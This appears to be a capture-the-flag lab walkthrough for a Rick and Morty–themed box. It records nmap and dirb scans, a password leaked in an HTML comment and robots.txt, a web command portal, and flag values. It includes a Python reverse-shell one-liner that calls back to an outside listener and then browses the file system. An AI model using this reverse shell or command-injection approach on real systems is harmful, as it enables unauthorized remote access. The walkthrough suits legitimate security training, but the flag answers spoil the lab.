nmap -sC -sV 10.10.89.228      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-26 11:14 CST
Nmap scan report for 10.10.89.228
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:ed:eb:b1:33:73:61:90:1a:08:82:ab:3a:0b:35:8d (RSA)
|   256 e1:24:7b:25:67:69:16:c8:2a:e4:43:cf:8c:ea:90:57 (ECDSA)
|_  256 ce:33:41:e4:2f:50:e1:76:bc:68:9c:aa:6d:8c:5d:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 12.91 seconds

Help Morty!

Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!

I need you to *BURRRP*....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is, I have no idea what the *BURRRRRRRRP*, password was! Help Morty, Help!

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
  <style>
  .jumbotron {
    background-image: url("assets/rickandmorty.jpeg");
    background-size: cover;
    height: 340px;
  }
  </style>
</head>
<body>

  <div class="container">
    <div class="jumbotron"></div>
    <h1>Help Morty!</h1></br>
    <p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
    <p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
    I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
  </div>

  <!--

    Note to self, remember username!

    Username: R1ckRul3s
    Possbile Password or Hint: *BURRRRRRRRP*

  -->

</body>
</html>




http://10.10.89.228/robots.txt

Wubbalubbadubdub


http://10.10.89.228/assets/
 	- 	 
[TXT]	bootstrap.min.css	2019-02-10 16:37 	119K	 
[ ]	bootstrap.min.js	2019-02-10 16:37 	37K	 
[IMG]	fail.gif	2019-02-10 16:37 	49K	 
[ ]	jquery.min.js	2019-02-10 16:37 	85K	 
[IMG]	picklerick.gif	2019-02-10 16:37 	222K	 
[IMG]	portal.jpg	2019-02-10 16:37 	50K	 
[IMG]	rickandmorty.jpeg	2019-02-10 16:37 	488K


dirb http://10.10.89.228/  

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Nov 26 11:14:34 2023
URL_BASE: http://10.10.89.228/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.89.228/ ----
==> DIRECTORY: http://10.10.89.228/assets/
                                                                                                                                                      
http://10.10.89.228/index.html (CODE:200|SIZE:1062)                                                                                                                                           
http://10.10.89.228/robots.txt (CODE:200|SIZE:17)                                                                                                                                             
http://10.10.89.228/server-status (CODE:403|SIZE:300) 
/login.php
/portal.php

I was able to login with credentials: R1ckRul3s:Wubbalubbadubdub

We are greated with a portal that allows commands to be executed. 

ls: 

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt


grep . clue.txt

Look around the file system for the other ingredient.

grep . Sup3rS3cretPickl3Ingred.txt

mr. meeseek hair

We found our first flag: mr. meeseek hair

Playing around with grep . through the filesystem we found that we can run commands on the portal.php area with a post request. 

export RHOST="10.6.9.14";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

$ s
ls
bin   etc         lib         media  proc  sbin  sys  var
boot  home        lib64       mnt    root  snap  tmp  vmlinuz
dev   initrd.img  lost+found  opt    run   srv   usr
$ cd home
cd home
$ ls
ls
rick  ubuntu
$ cd rick
cd rick
$ ls
ls
second ingredients
$ cat "second ingredients"
cat "second ingredients"
1 jerry tear

